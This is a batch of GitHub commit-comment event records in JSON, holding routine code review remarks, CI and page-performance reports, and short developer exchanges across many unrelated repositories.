{"id":"7995472205","type":"CommitCommentEvent","actor":{"login":"angerman"},"repo":{"name":"hvr/head.hackage"},"payload":{"comment":{"id":29780608,"position":null,"line":null,"path":null,"commit_id":"cc50208aa21103e75b79db2ba272c1d3d254bca1","created_at":"2018-07-20T14:50:25Z","updated_at":"2018-07-20T14:50:25Z","author_association":"CONTRIBUTOR","body":"👍 "}},"created_at":"2018-07-20T14:50:25Z"}
{"id":"7995473121","type":"CommitCommentEvent","actor":{"login":"ckingdon95"},"repo":{"name":"lrennels/fund"},"payload":{"comment":{"id":29780610,"position":null,"line":null,"path":null,"commit_id":"ded0ef74e6da84ffae0b10c080c9a57684f06268","created_at":"2018-07-20T14:50:34Z","updated_at":"2018-07-20T14:50:34Z","author_association":"COLLABORATOR","body":"@lrennels that's what I thought too but when I try to run this test file without it, I get an error \"FUND not defined\"... does that not happen for you?"}},"created_at":"2018-07-20T14:50:34Z"}
{"id":"7995474699","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780611,"position":408,"line":320,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-20T14:50:50Z","updated_at":"2018-07-20T14:50:50Z","author_association":"NONE","body":"`} else if (outcome == Outcome.inviterWins) {`"}},"created_at":"2018-07-20T14:50:50Z"}
{"id":"7995480091","type":"CommitCommentEvent","actor":{"login":"timbgr"},"repo":{"name":"Soulofdestiny/os-autoinst-distri-opensuse"},"payload":{"comment":{"id":29780623,"position":null,"line":null,"path":null,"commit_id":"b9aa7205eff6d2ca0e83ffbc109318c6b377f724","created_at":"2018-07-20T14:51:45Z","updated_at":"2018-07-20T14:51:45Z","author_association":"NONE","body":"I tried to execute the testcases in different ways:\r\n1) as proposed in this version\r\n`sub test_flags {`\r\n`    return {milestone => 1};`\r\n`}`\r\n2) slightly modified\r\n`sub test_flags {`\r\n`    return {milestone => 1, fatal => 0};`\r\n`}`\r\n![openqa3](https://user-images.githubusercontent.com/40659097/43009077-59375dc4-8c45-11e8-8172-391a08b9dadd.png)\r\n\r\nThen I tried to regroup testcases so they are in the same folder\r\n![openqa4](https://user-images.githubusercontent.com/40659097/43009129-74234ada-8c45-11e8-81e4-fabebbc6c405.png)\r\n\r\nIn all ways - result is the same: Test execution has stopped if one of testcases failed."}},"created_at":"2018-07-20T14:51:45Z"}
{"id":"7995486881","type":"CommitCommentEvent","actor":{"login":"fmvilas"},"repo":{"name":"asyncapi/asyncapi"},"payload":{"comment":{"id":29780640,"position":4,"line":4,"path":"schema/asyncapi.json","commit_id":"57dfc9566a110ddfae218d2732fc413189147066","created_at":"2018-07-20T14:52:54Z","updated_at":"2018-07-20T14:52:54Z","author_association":"MEMBER","body":"About adding the other schemas here, it's a nice idea. Feel free to open a PR."}},"created_at":"2018-07-20T14:52:54Z"}
{"id":"7995487936","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780648,"position":269,"line":378,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T14:53:06Z","updated_at":"2018-07-20T14:53:06Z","author_association":"NONE","body":"Truck size hole right there?"}},"created_at":"2018-07-20T14:53:06Z"}
{"id":"7995488489","type":"CommitCommentEvent","actor":{"login":"JCofman"},"repo":{"name":"JCofman/jc-website"},"payload":{"comment":{"id":29780649,"position":null,"line":null,"path":null,"commit_id":"c9092ef938ae2e608b135b54241ef210589376a0","created_at":"2018-07-20T14:53:11Z","updated_at":"2018-07-20T14:53:11Z","author_association":"OWNER","body":"\n# WebpageTest report\n* run id: 180720_NX_c761e790bdc1076d6a9f40534a144e64\n* URL testid: https://blazingly-fast-blog-qisbmjpbxw.now.sh\n* Summary of the test: http://www.webpagetest.org/results.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64\n* location where the test has run: Dulles:Chrome\n* from run parameter: Dulles, VA - <b>Chrome</b> - <b>Cable</b>\n* connectivity: Cable\n* runs: [object Object], successFullRuns: 1\n\n## Report\n### FirstView\n| File | FileSize | \n|----------|----------|\n /|14.13 kB \r\n/static/d/350/path---index-6a9-mHO53bQfhB506fWk032UDuITgUQ.json|651 B \r\n/webpack-runtime-ad26739a69fbf086873e.js|1.67 kB \r\n/0-a1606b9d1bfd33819b75.js|20.84 kB \r\n/component---src-pages-index-js-012371d8b96b8cf9e7e9.js|10.29 kB \r\n/app-5bb4ec6a90550fcc1571.js|55.74 kB \r\n/static/montserrat-latin-900-260c2ea3ef57feb82251952e605a36d5.woff2|18.4 kB \r\n/static/merriweather-latin-400-f936cb550d4dcd769f75c453207ac5e6.woff2|18.54 kB \r\n/static/merriweather-latin-700-1636f13a52ca3f0eb8784c9c57f62082.woff2|18.22 kB \r\n/static/merriweather-latin-900-46631a9aab93dec3ed34f429dd1a5646.woff2|18.39 kB \r\n/analytics.js|14.32 kB \r\n/r/collect?v=1&_v=j68&a=370097327&t=pageview&_s=1&dl=https%3A%2F%2Fblazingly-fast-blog-qisbmjpbxw.now.sh%2F&dp=%2F&ul=en-us&de=UTF-8&dt=Gatsby%20Starter%20Blog&sd=24-bit&sr=1920x1200&vp=1009x702&je=0&_u=aEBAAEAB~&jid=1144927802&gjid=594153075&cid=1635744544.1532098355&tid=undefined&_gid=930186034.1532098355&_r=1&z=1961719707|199 B \r\n/6-31534323681914d06054.js|707 B \r\n/sw.js|8.76 kB \r\n/component---src-templates-blog-post-js-fc2871a412c05b7351d4.js|10.59 kB \r\n/favicon.ico|181 B \r\n/component---node-modules-gatsby-plugin-offline-app-shell-js-f3a55807e56ceb4c7c1d.js|292 B \r\n/index.html?_sw-precache=96648dcf368e410af8bc72bee081d560|NaN undefined \r\n/offline-plugin-app-shell-fallback/index.html?_sw-precache=ab599ac33768cf570da93995345b7c8f|NaN undefined \r\n/rss.xml?_sw-precache=85596dc2f3d7a86acdc51eb23c661e02|3.48 kB \r\n/static/d/629/path---my-second-post-2-aa-e94-6pkUQRnOt0UQfXrv04swShoDjxs.json|660 B \r\n/offline-plugin-app-shell-fallback/index|NaN undefined \r\n/index|NaN undefined \r\n/static/d/682/path---hi-folks-a-2-b-1cc-O1OljPK6uBakP5QwT25xzf9yXA.json|1.96 kB \r\n/offline-plugin-app-shell-fallback|2.49 kB \r\n\n\n# VisualMetrics\n## Metrics Median\n| View | Time to First Byte |  Render Started  |  Visualy Completed | SpeedIndex | Load Time |\n|----------|----------|:-------------:|------:| ------:|------:|\nFirstView  | 659 | 800 | 1300 | 881 | 1926 |  \nRepeatView | 402 | 300 | 400 | 311 | 431 |  \n\n  ## Metrics Average\n| View | Time to First Byte |  Render Started  |  Visualy Completed | SpeedIndex | Load Time |\n|----------|----------|:-------------:|------:| ------:|------:|\nFirstView  | 659 | 800 | 1300 | 881 | 1926 |  \nRepeatView | 402 | 300 | 400 | 311 | 431 |  \n\n\n# Waterfall\n\n## FirstView median\n![alt text](http://www.webpagetest.org/results/18/07/20/NX/c761e790bdc1076d6a9f40534a144e64/1_waterfall.png)\n\n\n# FilmStrip\n## FirstView median\n\n| 0 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64&video=video_1&file=ms_000000.jpg)|\n| 0|\n    \n| 800 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64&video=video_1&file=ms_000800.jpg)|\n| 50|\n    \n| 900 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64&video=video_1&file=ms_000900.jpg)|\n| 90|\n    \n| 1200 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64&video=video_1&file=ms_001200.jpg)|\n| 99|\n    \n| 1300 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64&video=video_1&file=ms_001300.jpg)|\n| 100|\n    \n        \n\n## ReapeatView median\n\n| 0 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64&video=video_1_cached&file=ms_000000.jpg)|\n| 0|\n    \n| 300 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64&video=video_1_cached&file=ms_000300.jpg)|\n| 89|\n    \n| 400 milliseconds|\n|--------------|\n| ![alt text](http://www.webpagetest.org/getfile.php?test=180720_NX_c761e790bdc1076d6a9f40534a144e64&video=video_1_cached&file=ms_000400.jpg)|\n| 100|\n    \n    "}},"created_at":"2018-07-20T14:53:11Z"}
{"id":"7995491057","type":"CommitCommentEvent","actor":{"login":"woniu95"},"repo":{"name":"woniu95/hellogithub"},"payload":{"comment":{"id":29780653,"position":null,"line":null,"path":null,"commit_id":"d345409fa2b80231c72e8c22633ca5b002176507","created_at":"2018-07-20T14:53:38Z","updated_at":"2018-07-20T14:53:38Z","author_association":"OWNER","body":"add first repository on github"}},"created_at":"2018-07-20T14:53:38Z"}
{"id":"7995493140","type":"CommitCommentEvent","actor":{"login":"IlyaSergeyev"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780658,"position":4,"line":3,"path":"builder/ConfCodecs.cmake","commit_id":"21daaf590fc2071c190e0d7a8533be24498c704d","created_at":"2018-07-20T14:54:01Z","updated_at":"2018-07-20T14:54:01Z","author_association":"OWNER","body":"And, I need to recover ANDROID ifdef's in umc_defs.h ..."}},"created_at":"2018-07-20T14:54:01Z"}
{"id":"7995498328","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780664,"position":542,"line":435,"path":"contracts/RockPaperScissors.sol","commit_id":"b85afd8baf463cc123fdc46f8ca0e351edcff46c","created_at":"2018-07-20T14:54:53Z","updated_at":"2018-07-20T14:54:53Z","author_association":"NONE","body":"It is correct, but isn't it weird that it does not read `Move.None`?"}},"created_at":"2018-07-20T14:54:53Z"}
{"id":"7995499246","type":"CommitCommentEvent","actor":{"login":"icc"},"repo":{"name":"h5p/h5p-editor-php-library"},"payload":{"comment":{"id":29780669,"position":230,"line":1302,"path":"scripts/h5peditor.js","commit_id":"f2d389a2537e5e366c37beedc3b594f0af45e4a2","created_at":"2018-07-20T14:55:03Z","updated_at":"2018-07-20T14:55:03Z","author_association":"MEMBER","body":"@otacke This is not very easy to read."}},"created_at":"2018-07-20T14:55:03Z"}
{"id":"7995501150","type":"CommitCommentEvent","actor":{"login":"tankeryang"},"repo":{"name":"tankeryang/banciyuan-downloader"},"payload":{"comment":{"id":29780672,"position":null,"line":null,"path":null,"commit_id":"9f9d0a0ef70cd71b5f3d2316cb32fc72fe361a57","created_at":"2018-07-20T14:55:22Z","updated_at":"2018-07-20T14:55:22Z","author_association":"OWNER","body":"@RyanJava 额，请问您的系统是32位还是64位的？win7orwin10？因为我只在win10_x64上测过，另外要是有问题反馈的话请提issue，这个犄角旮旯的地方有个评论容易忽略。。"}},"created_at":"2018-07-20T14:55:22Z"}
{"id":"7995501894","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780674,"position":4,"line":22,"path":"_studio/mfx_lib/genx/copy_kernels/src/genx_cht_copy_isa.cpp","commit_id":"ef966fb11120920fa93b3e049b8fda92967ca0eb","created_at":"2018-07-20T14:55:29Z","updated_at":"2018-07-20T14:55:29Z","author_association":"NONE","body":"We need to agree on the pattern within this commit. And later we can contribute to the pattern with disabling MCTF and LA. I think we can start with the common option at cmake level: ENABLE_CMRT which will affect _all_ CM support. Most probably we won't need anything else. However, if we will need something we will define:\r\n* ENABLE_CMRT_COPY\r\n* ENABLE_CMRT_MCTF\r\n* ENABLE_CMRT_LA\r\n\r\noptions."}},"created_at":"2018-07-20T14:55:29Z"}
{"id":"7995506305","type":"CommitCommentEvent","actor":{"login":"oduvan"},"repo":{"name":"ksandkov/django-voodp-store"},"payload":{"comment":{"id":29780681,"position":19,"line":19,"path":"mainpage/views.py","commit_id":"028d9b7bcded3e3f68df3f5430573f9106838a57","created_at":"2018-07-20T14:56:15Z","updated_at":"2018-07-20T14:56:15Z","author_association":"NONE","body":"не называй переменную *_id если ты в ней будешь хранить объект, а не id-шник. Только запутаешься потом"}},"created_at":"2018-07-20T14:56:15Z"}
{"id":"7995515081","type":"CommitCommentEvent","actor":{"login":"IlyaSergeyev"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780698,"position":4,"line":22,"path":"_studio/mfx_lib/genx/copy_kernels/src/genx_cht_copy_isa.cpp","commit_id":"ef966fb11120920fa93b3e049b8fda92967ca0eb","created_at":"2018-07-20T14:57:47Z","updated_at":"2018-07-20T14:57:47Z","author_association":"OWNER","body":"I agree with it."}},"created_at":"2018-07-20T14:57:47Z"}
{"id":"7995518967","type":"CommitCommentEvent","actor":{"login":"Nisan34"},"repo":{"name":"ma1co/Sony-PMCA-RE"},"payload":{"comment":{"id":29780702,"position":null,"line":null,"path":null,"commit_id":"758f2a5c4f3510bae04dc143360d9c040efa09ae","created_at":"2018-07-20T14:58:26Z","updated_at":"2018-07-20T14:58:26Z","author_association":"NONE","body":"### "}},"created_at":"2018-07-20T14:58:26Z"}
{"id":"7995520766","type":"CommitCommentEvent","actor":{"login":"Itay2805"},"repo":{"name":"Itay2805/Attack"},"payload":{"comment":{"id":29780707,"position":null,"line":null,"path":null,"commit_id":"d25b5d1e774b85235719efb1c76bbad2d2e3b98d","created_at":"2018-07-20T14:58:44Z","updated_at":"2018-07-20T14:58:44Z","author_association":"OWNER","body":"@httpdigest we tried to include the Gradle one made for Android, but it didn't let us build the app because it couldn't resolve the dependencie, this is not a LWJGL project but an Android one, we are using the built in GLES stuff. And since the Gradle one didn't load I was just lazy, downloaded the android branch and added it, and it worked :shrug: "}},"created_at":"2018-07-20T14:58:44Z"}
{"id":"7995524097","type":"CommitCommentEvent","actor":{"login":"emmaajohaansson"},"repo":{"name":"emmaajohaansson/assignment3"},"payload":{"comment":{"id":29780711,"position":null,"line":null,"path":null,"commit_id":"02efac73f5cf9ad54dff1dc51b65ad662c84e340","created_at":"2018-07-20T14:59:18Z","updated_at":"2018-07-20T14:59:18Z","author_association":"OWNER","body":"Tv-shows, not games..."}},"created_at":"2018-07-20T14:59:18Z"}
{"id":"7995524112","type":"CommitCommentEvent","actor":{"login":"greysteil"},"repo":{"name":"cormacrelf/angular-skyhook"},"payload":{"comment":{"id":29780712,"position":null,"line":null,"path":null,"commit_id":"c010dd5284553e5a34d6fb9f66ec6cc1e837fd1f","created_at":"2018-07-20T14:59:18Z","updated_at":"2018-07-20T14:59:18Z","author_association":"NONE","body":"Now done. Apologies again!"}},"created_at":"2018-07-20T14:59:18Z"}
{"id":"7995526705","type":"CommitCommentEvent","actor":{"login":"grshane"},"repo":{"name":"wvu-online/online-orientation"},"payload":{"comment":{"id":29780719,"position":null,"line":null,"path":null,"commit_id":"5c900c6c4bcf7ebfb61ad7f349210a451dc91d2d","created_at":"2018-07-20T14:59:45Z","updated_at":"2018-07-20T14:59:45Z","author_association":"COLLABORATOR","body":"Created multidev environment [online-orientation#pr-29](https://dashboard.pantheon.io/sites/714bd05e-1a33-4f35-93a2-e9d6add67063#pr-29).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-29-online-orientation.pantheonsite.io/)"}},"created_at":"2018-07-20T14:59:45Z"}
{"id":"7995528975","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780724,"position":106,"line":106,"path":"test/rockspaperscissors.js","commit_id":"335dcb20a471c8b4f3bbda7348ded3624b75d906","created_at":"2018-07-20T15:00:09Z","updated_at":"2018-07-20T15:00:09Z","author_association":"NONE","body":"How about passing invalid data?"}},"created_at":"2018-07-20T15:00:09Z"}
{"id":"7995536796","type":"CommitCommentEvent","actor":{"login":"MichaelDimmitt"},"repo":{"name":"MichaelDimmitt/honeycomb"},"payload":{"comment":{"id":29780747,"position":223,"line":133,"path":"index.js","commit_id":"30661c4032146c10a89074ef85bd9bc32ac757fb","created_at":"2018-07-20T15:01:24Z","updated_at":"2018-07-20T15:01:24Z","author_association":"OWNER","body":"super positive!"}},"created_at":"2018-07-20T15:01:24Z"}
{"id":"7995537325","type":"CommitCommentEvent","actor":{"login":"ThibaultLesuisse"},"repo":{"name":"TeamWin/android_device_lge_bullhead"},"payload":{"comment":{"id":29780750,"position":null,"line":null,"path":null,"commit_id":"e110ef62dce8c2ed9112d12a22480a41509afc3d","created_at":"2018-07-20T15:01:29Z","updated_at":"2018-07-20T15:01:29Z","author_association":"NONE","body":"@Dees-Troy decryption is not working for me, could this note be related?\r\nOS: Lineage 15.1\r\nTWRP: 3.2.2\r\n"}},"created_at":"2018-07-20T15:01:29Z"}
{"id":"7995544267","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780766,"position":28,"line":84,"path":"stand/efi/loader/multiboot2.c","commit_id":"928ff99445969a320b50594a76f503df89aba23b","created_at":"2018-07-20T15:02:38Z","updated_at":"2018-07-20T15:02:38Z","author_association":"NONE","body":"missing check for NULL"}},"created_at":"2018-07-20T15:02:38Z"}
{"id":"7995546809","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":29780770,"position":null,"line":null,"path":null,"commit_id":"b8e8f9af78f4ef3e556dd3cef6bfee35ad4cb82a","created_at":"2018-07-20T15:03:04Z","updated_at":"2018-07-20T15:03:04Z","author_association":"MEMBER","body":"No idea how you ended up in this ancient commit, but the tests are valid :smiley:\r\n\r\nBasically, before this change if either object was a `RegExp` and the other wasn't, the function would end up in [this code path][1] (comparing the objects' own keys).\r\n\r\nSince `RegExp`s don't have any enumerable own keys, any `RegExp` would be considered equal to `{}` (or to other objects with no enumerable own keys, such as `Date`).\r\n\r\nThe tests test exactly that. \r\n\r\n[1]: https://github.com/angular/angular.js/commit/b8e8f9af78f4ef3e556dd3cef6bfee35ad4cb82a#diff-1d54c5f722aebc473dbe96f836ddf974R858"}},"created_at":"2018-07-20T15:03:04Z"}
{"id":"7995547234","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780772,"position":209,"line":209,"path":"test/rockspaperscissors.js","commit_id":"335dcb20a471c8b4f3bbda7348ded3624b75d906","created_at":"2018-07-20T15:03:09Z","updated_at":"2018-07-20T15:03:09Z","author_association":"NONE","body":"I think `.plus(someMoreMoneyForExtraBalance)` will work."}},"created_at":"2018-07-20T15:03:09Z"}
{"id":"7995547396","type":"CommitCommentEvent","actor":{"login":"Olezha"},"repo":{"name":"Olezha/Quadro"},"payload":{"comment":{"id":29780773,"position":null,"line":null,"path":null,"commit_id":"1bd6ec8e86fbdb02b8904a09fd1d622fbf71351c","created_at":"2018-07-20T15:03:11Z","updated_at":"2018-07-20T15:03:11Z","author_association":"OWNER","body":"Очень странно. Я на одном компе залил коммиты с ревью, а на другом забрал коммиты в открытый проект, было предложение смержить и как-то вышло, что целая пачка коммитов попала сюда. Я использовал команды только pull, add, commit и push, все без особых флагов.\r\nНадо бы как-то поправить."}},"created_at":"2018-07-20T15:03:11Z"}
{"id":"7995548165","type":"CommitCommentEvent","actor":{"login":"royger"},"repo":{"name":"kristapuciitis/freebsd"},"payload":{"comment":{"id":29780778,"position":20,"line":76,"path":"stand/efi/loader/multiboot2.c","commit_id":"928ff99445969a320b50594a76f503df89aba23b","created_at":"2018-07-20T15:03:19Z","updated_at":"2018-07-20T15:03:19Z","author_association":"NONE","body":"You can use *tag here instead of struct multiboot2_tag, should be shorter. The same applies to all the other sizeofs below."}},"created_at":"2018-07-20T15:03:19Z"}
{"id":"7995548284","type":"CommitCommentEvent","actor":{"login":"NeverPire"},"repo":{"name":"Ludeon/RimWorld-fr"},"payload":{"comment":{"id":29780781,"position":null,"line":null,"path":null,"commit_id":"c127a199d7d5d6090f9b983337c5fd245d743560","created_at":"2018-07-20T15:03:20Z","updated_at":"2018-07-20T15:03:20Z","author_association":"CONTRIBUTOR","body":"Je me suis basé sur les traductions chinoises et russes pour trouver la traduction appropriée.\r\n\r\nConcernant NoDietCategoryLetter, les traducteurs des autres langues traduisent aussi par \"Pas de lettre\" donc on va laisser ça faute de comprendre réellement le fin mot de l'histoire."}},"created_at":"2018-07-20T15:03:20Z"}
{"id":"7995548356","type":"CommitCommentEvent","actor":{"login":"paomonster"},"repo":{"name":"paomonster/myfiles"},"payload":{"comment":{"id":29780782,"position":null,"line":null,"path":null,"commit_id":"6cc31c06b58693c578f944fd1a14a642bb7e50ca","created_at":"2018-07-20T15:03:21Z","updated_at":"2018-07-20T15:03:21Z","author_association":"OWNER","body":"Out"}},"created_at":"2018-07-20T15:03:21Z"}
{"id":"7995553025","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780793,"position":176,"line":176,"path":"test/rockspaperscissors.js","commit_id":"335dcb20a471c8b4f3bbda7348ded3624b75d906","created_at":"2018-07-20T15:04:11Z","updated_at":"2018-07-20T15:04:11Z","author_association":"NONE","body":"Experiment with the arrow notation:\r\n\r\n```javascript\r\n.then(() => rockPaperScissors.invite(invitee, secondsToDeadline, gameId, \r\n          {from: inviter, gasPrice: gasPrice, value: moneyAtStake \r\n          }))\r\n.then(\r\n```"}},"created_at":"2018-07-20T15:04:11Z"}
{"id":"7995553968","type":"CommitCommentEvent","actor":{"login":"NimaQu"},"repo":{"name":"NimaQu/ss-panel-v3-mod_Uim"},"payload":{"comment":{"id":29780795,"position":null,"line":null,"path":null,"commit_id":"b3697d0818d3954db9541da4b5b1914315c15b81","created_at":"2018-07-20T15:04:22Z","updated_at":"2018-07-20T15:04:22Z","author_association":"OWNER","body":"打完星际不能写代码"}},"created_at":"2018-07-20T15:04:22Z"}
{"id":"7995564035","type":"CommitCommentEvent","actor":{"login":"dvrogozh"},"repo":{"name":"IlyaSergeyev/MediaSDK"},"payload":{"comment":{"id":29780814,"position":4,"line":22,"path":"_studio/mfx_lib/genx/copy_kernels/src/genx_cht_copy_isa.cpp","commit_id":"ef966fb11120920fa93b3e049b8fda92967ca0eb","created_at":"2018-07-20T15:06:12Z","updated_at":"2018-07-20T15:06:12Z","author_association":"NONE","body":"by the way, please, don't name options, variables, etc. with 'No' in the name. ifndef !NO gives issues in understanding. Just ENABLE_FEATURE is ok."}},"created_at":"2018-07-20T15:06:12Z"}
{"id":"7995567386","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29780820,"position":325,"line":325,"path":"test/rockspaperscissors.js","commit_id":"335dcb20a471c8b4f3bbda7348ded3624b75d906","created_at":"2018-07-20T15:06:47Z","updated_at":"2018-07-20T15:06:47Z","author_association":"NONE","body":"If some code blocks are repeated from one `it` to the next, consider encapsulating them in a `describe` and use a `beforeEach` in there to do this repeated stuff."}},"created_at":"2018-07-20T15:06:47Z"}
{"id":"7995570612","type":"CommitCommentEvent","actor":{"login":"roopa-rajala"},"repo":{"name":"roopa-rajala/Spring-applications"},"payload":{"comment":{"id":29780830,"position":null,"line":null,"path":null,"commit_id":"76e2bce0d3ceb72e5f1df18ff3f5e0907a0b2538","created_at":"2018-07-20T15:07:22Z","updated_at":"2018-07-20T15:07:22Z","author_association":"OWNER","body":"Performed post,put and delete."}},"created_at":"2018-07-20T15:07:22Z"}
{"id":"7995571018","type":"CommitCommentEvent","actor":{"login":"featurecat"},"repo":{"name":"featurecat/lizzie"},"payload":{"comment":{"id":29780832,"position":44,"line":452,"path":"src/main/java/featurecat/lizzie/analysis/Leelaz.java","commit_id":"20611dbfdd3349204bfc14792544b62f95d97b26","created_at":"2018-07-20T15:07:27Z","updated_at":"2018-07-20T15:07:27Z","author_association":"OWNER","body":"well, just make sure it's configurable via the file. some users will be annoyed if they must press D every time they start lizzie. I don't think we should bind it to a key. It should be in the Config. I think by default it can be on. "}},"created_at":"2018-07-20T15:07:27Z"}
{"id":"7995571990","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29780834,"position":null,"line":null,"path":null,"commit_id":"e17266cba39a9a4fe68cfcb5ff574472db47fd3e","created_at":"2018-07-20T15:07:37Z","updated_at":"2018-07-20T15:07:37Z","author_association":"NONE","body":"#6599-HVACAirloopUnitarySystem-does-not-honor-continuous-fan-mode-using-multispeed-heating-coil (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (2322 of 2323 tests passed, 0 test warnings)\n\n\n\nFailures:\n\n\nintegration Test Summary\n * Passed: 627\n * Failed: 1\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.96%25-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-e17266cba39a9a4fe68cfcb5ff574472db47fd3e-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.18%25-green.png)</a>\n"}},"created_at":"2018-07-20T15:07:37Z"}
{"id":"7995573652","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780838,"position":5,"line":5,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-20T15:07:54Z","updated_at":"2018-07-20T15:07:54Z","author_association":"NONE","body":"This is terrible idea! **Anyone** can call it and become the owner. Being the owner does not mean anything in this case."}},"created_at":"2018-07-20T15:07:54Z"}
{"id":"7995576431","type":"CommitCommentEvent","actor":{"login":"dezgeg"},"repo":{"name":"matthewbauer/nixpkgs"},"payload":{"comment":{"id":29780841,"position":3,"line":13,"path":"pkgs/build-support/bintools-wrapper/setup-hook.sh","commit_id":"110b5e0b6a8db0008c5698bf6aea986b0af0df6b","created_at":"2018-07-20T15:08:22Z","updated_at":"2018-07-20T15:08:22Z","author_association":"NONE","body":"How about simply skipping the directory if it doesn't contain any non-directories? I.e. something like (not much tested):\r\n\r\n````\r\nif [ -z \"$(find \"$1\" -maxdepth 1 \\! -type d -printf nonempty -quit )\" ]; return; fi"}},"created_at":"2018-07-20T15:08:22Z"}
{"id":"7995577923","type":"CommitCommentEvent","actor":{"login":"xavierlepretre"},"repo":{"name":"Srinivas-Sathyanarayanan/blockChainLearnings"},"payload":{"comment":{"id":29780843,"position":5,"line":5,"path":"ProjSplitter/contracts/Splitter.sol","commit_id":"a7e96f8137a04248497b98d2eaf49f59d0639585","created_at":"2018-07-20T15:08:36Z","updated_at":"2018-07-20T15:08:36Z","author_association":"NONE","body":"The owner, and anyone that matters to a contract, should be set at construction, and then changed if and only if permissions are ok."}},"created_at":"2018-07-20T15:08:36Z"}
{"id":"7995581342","type":"CommitCommentEvent","actor":{"login":"nitaro"},"repo":{"name":"StateArchivesOfNorthCarolina/tomes-eaxs"},"payload":{"comment":{"id":29780849,"position":null,"line":null,"path":null,"commit_id":"4776d89d4b89d3be765fb903c95acdf8697c4a74","created_at":"2018-07-20T15:09:14Z","updated_at":"2018-07-20T15:09:14Z","author_association":"COLLABORATOR","body":"Corrected commit typo."}},"created_at":"2018-07-20T15:09:14Z"}
{"id":"7995581403","type":"CommitCommentEvent","actor":{"login":"Olezha"},"repo":{"name":"Olezha/Quadro"},"payload":{"comment":{"id":29780850,"position":null,"line":null,"path":null,"commit_id":"1bd6ec8e86fbdb02b8904a09fd1d622fbf71351c","created_at":"2018-07-20T15:09:14Z","updated_at":"2018-07-20T15:09:14Z","author_association":"OWNER","body":"![2018-07-20 18-06-48](https://user-images.githubusercontent.com/7818007/43010038-ff807f38-8c47-11e8-899e-e36fd1281f9f.png)\r\n"}},"created_at":"2018-07-20T15:09:14Z"}
